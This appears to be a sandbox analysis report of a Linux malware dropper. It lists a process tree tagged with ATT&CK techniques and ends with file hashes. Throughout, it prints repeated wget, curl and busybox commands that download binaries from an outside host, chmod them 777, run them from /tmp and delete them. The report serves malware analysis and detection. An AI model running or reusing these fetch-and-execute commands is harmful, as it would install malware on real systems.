/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- System Network Configuration Discovery
PID:953
-
-
/bin/chmodchmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:956
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- System Network Configuration Discovery
PID:957
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- System Network Configuration Discovery
PID:960
-
-
/bin/chmodchmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:963
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- System Network Configuration Discovery
PID:964
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- System Network Configuration Discovery
PID:967
-
-
/bin/chmodchmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:970
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:971
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:974
-
-
/bin/chmodchmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:977
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- System Network Configuration Discovery
PID:978
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- System Network Configuration Discovery
PID:981
-
-
/bin/chmodchmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:984
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- System Network Configuration Discovery
PID:985
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:986
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- System Network Configuration Discovery
PID:988
-
-
/bin/chmodchmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- File and Directory Permissions Modification
PID:989
-
-
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Executes dropped EXE
PID:990
-
-
/bin/rmrm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:991
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- System Network Configuration Discovery
PID:992
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:993
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- System Network Configuration Discovery
PID:995
-
-
/bin/chmodchmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- File and Directory Permissions Modification
PID:996
-
-
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Executes dropped EXE
PID:997
-
-
/bin/rmrm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:998
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- System Network Configuration Discovery
PID:999
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1000
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- System Network Configuration Discovery
PID:1002
-
-
/bin/chmodchmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- File and Directory Permissions Modification
PID:1003
-
-
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Executes dropped EXE
PID:1004
-
-
/bin/rmrm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:1005
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:1006
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1007
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- System Network Configuration Discovery
PID:1009
-
-
/bin/chmodchmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- File and Directory Permissions Modification
PID:1010
-
-
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Executes dropped EXE
PID:1011
-
-
/bin/rmrm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:1012
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- System Network Configuration Discovery
PID:1013
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1014
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- System Network Configuration Discovery
PID:1016
-
-
/bin/chmodchmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- File and Directory Permissions Modification
PID:1017
-
-
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Executes dropped EXE
PID:1018
-
-
/bin/rmrm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:1019
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97